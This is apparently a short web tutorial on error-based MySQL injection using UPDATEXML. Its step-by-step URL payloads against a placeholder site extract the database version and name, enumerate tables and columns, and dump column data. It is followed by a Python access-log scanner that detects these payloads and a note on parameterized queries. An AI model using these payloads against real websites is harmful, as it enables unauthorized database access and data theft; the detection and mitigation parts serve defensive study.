Kyfx

XPATH Injection Using UPDATEXML

Jul 25th, 2015
Now let's start injecting manually. We are injecting a site and execute our UNION-based query, but we do not get any output, so we will use XPATH injection there.
For example, here is our UNION-based query:

http://www.VulnSite.com/news.php?id=6 and 0 Union Select 1,2,3,4,5-- -

After executing this query we do not get any output, or sometimes we get this type of error:
"The used SELECT statements have a different number of columns"
So we will use XPATH injection to inject the database.
Let's try to get the version using XPATH injection with an UPDATEXML query.
Our XPATH query will be:

http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,version()),null)-- -

After executing the query we get this type of output:

XPATH syntax error: ':VERSION_HERE'

Now let's check the current database name. Our query for getting the current database will be:

http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,database()),null)-- -

And we get this output:
XPATH syntax error: ':CURRENT_DATABASE_NAME_HERE'

Now let's continue our injection and get the tables in the current database.
This will be our query for the tables:

http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),null)-- -

After executing the query we get this output:

XPATH syntax error: ':SOME_TABLE_NAME_HERE'

Since we are injecting with XPATH injection, we increase the LIMIT to get the other tables in the current database.
After getting the tables from the current database, our next step is to get the columns from the tables.
Our query for getting the columns will be:

http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(column_name) from information_schema.columns where table_name='OUR_TABLE_NAME_HERE' limit 0,1)),null)-- -

We increase the LIMIT to get the other columns in the targeted table.
After getting the columns, the final part is to dump the data from the columns.
Our final query will be:

http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(OUR_COLUMN_NAME_HERE) from OUR_TABLE_NAME_HERE)),null)-- -
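Seen from the web server's access log, every request in this walkthrough has the same shape: a call to updatexml( in the id parameter, first around version() or database(), then around information_schema, then around a plain subquery. The following is an added example, not part of the original paste: a log scanner that URL-decodes each request and reports which of those stages each client reached. The log lines, addresses, stage names and function names are constructed for illustration, and it also matches EXTRACTVALUE, which goes beyond the text but reports XPath errors the same way.

```python
import re
from urllib.parse import unquote_plus

# A call to one of MySQL's XML functions; EXTRACTVALUE reports XPath errors the same way.
XML_FUNC = re.compile(r"\b(updatexml|extractvalue)\s*\(")
# Stage of the walkthrough a request corresponds to, most specific first.
STAGES = [
    ("schema-enum", re.compile(r"information_schema\s*\.\s*(tables|columns)")),
    ("data-read", re.compile(r"\(\s*select\b")),
    ("fingerprint", re.compile(r"\b(version|database)\s*\(\s*\)")),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return the stage name for a request URL, or None if it has no XML-function call."""
    text = re.sub(r"\s+", " ", unquote_plus(url)).lower()  # logs store %20 / + for spaces
    if not XML_FUNC.search(text):
        return None
    for name, rx in STAGES:
        if rx.search(text):
            return name
    return "xml-func"

def scan(lines):
    """Map client address -> stages seen, in log order."""
    hits = {}
    for line in lines:
        m = REQUEST.match(line)
        stage = classify(m.group(2)) if m else None
        if stage:
            hits.setdefault(m.group(1), []).append(stage)
    return hits

# Constructed sample log (documentation addresses, placeholder names from the text above).
PREFIX = '198.51.100.7 - - [25/Jul/2015:10:01:0%d +0000] "GET /news.php?id=6%s HTTP/1.1" 200 312'
SAMPLE_LOG = [
    PREFIX % (1, ""),
    PREFIX % (2, "%20and%20updatexml(null,concat(0x3a3a,version()),null)--%20-"),
    PREFIX % (3, "+and+UpdateXML(null,concat(0x3a3a,(select+concat(table_name)+from+"
                 "information_schema.tables+where+table_schema=database()+limit+0,1)),null)--+-"),
    PREFIX % (4, "%20and%20updatexml(null,concat(0x3a3a,(select%20concat(OUR_COLUMN_NAME_HERE)"
                 "%20from%20OUR_TABLE_NAME_HERE)),null)--%20-"),
    '203.0.113.20 - - [25/Jul/2015:10:02:00 +0000] "GET /docs.php?q=updatexml+syntax HTTP/1.1" 200 8841',
]

if __name__ == "__main__":
    for client, stages in scan(SAMPLE_LOG).items():
        print(client, "->", " > ".join(stages))
```

Detection is a backstop: the leak depends on the application concatenating id into the SQL text and returning the MySQL error message to the client, so binding id as a query parameter and keeping database errors out of responses removes it.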